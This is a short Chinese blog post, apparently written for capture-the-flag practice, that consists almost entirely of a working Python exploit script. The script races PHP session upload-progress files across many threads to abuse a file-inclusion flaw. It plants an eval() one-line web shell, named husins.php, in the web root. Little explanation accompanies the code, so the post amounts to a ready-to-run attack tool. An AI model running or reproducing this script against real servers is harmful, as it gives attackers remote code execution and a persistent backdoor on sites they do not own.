Python session 文件包含脚本

发布于 2021-10-17  156 次阅读


import io
import requests
import threading

url = "" # 网站url
filename = "husins.php"  # 生成木马文件名
path = "/var/www/html/" # 生成木马文件路径
sessid = "husins" # session名
getAgrv = "" # 文件包含get的参数
postArgv = "ctf" # 文件包含post的参数
sessPath = "/tmp/sess_" + sessid

def write(session):
    while event.isSet():
        f = io.BytesIO(b'a' * 1024 * 50)  # 创建文件
        response = session.post(  # post文件上传
            url,  # url
            cookies={'PHPSESSID': sessid},  # 设置cookie为我们的sessid
            data={"PHP_SESSION_UPLOAD_PROGRESS": "<?php eval($_POST[1]);?>"},  # 写马或执行内容
            files={"file": ('husins.txt', f)}  # 上传文件的具体内容,文件名和文件内容
        )

def post_read(session):
    while event.is_set():
        data = {
            postArgv : sessPath
        }
        res = session.post(url=url, data=data)
        if "husins.txt" in res.text:
            data2 = {
                postArgv: sessPath,
                "1": "file_put_contents('"+ path + filename + "' , '<?php eval($_POST[2]);?>');"
            }
            cookies = {
                "PHPSESSID": sessid
            }
            res2 = session.post(url=url, data=data2, cookies=cookies)
            if res2.status_code == 200:
                print("[*]成功写入一句话!")
            else:
                print("[-]仍在尝试中,请稍后!")

def get_read(session):
    while event.is_set():
        getUrl=url + getAgrv + "=" + sessPath
        data = {
            "1": "file_put_contents('" + path + filename + "' , '<?php eval($_POST[2]);?>');"
        }
        cookies = {
            "PHPSESSID": sessid
        }
        session.post(url=getUrl, data=data, cookies=cookies)
        res = session.get(url + filename)
        if res.status_code == 200:
            print("[*]成功写入一句话!")
        else:
            print("[-]仍在尝试中,请稍后!")

if __name__ == '__main__':                                  #双线程运行
    event = threading.Event()
    event.set()
    with requests.session() as session:
        for i in range(1,30):
            threading.Thread(target=write,args=(session,)).start()

        for i in range(1,30):
            threading.Thread(target=get_read,args=(session,)).start()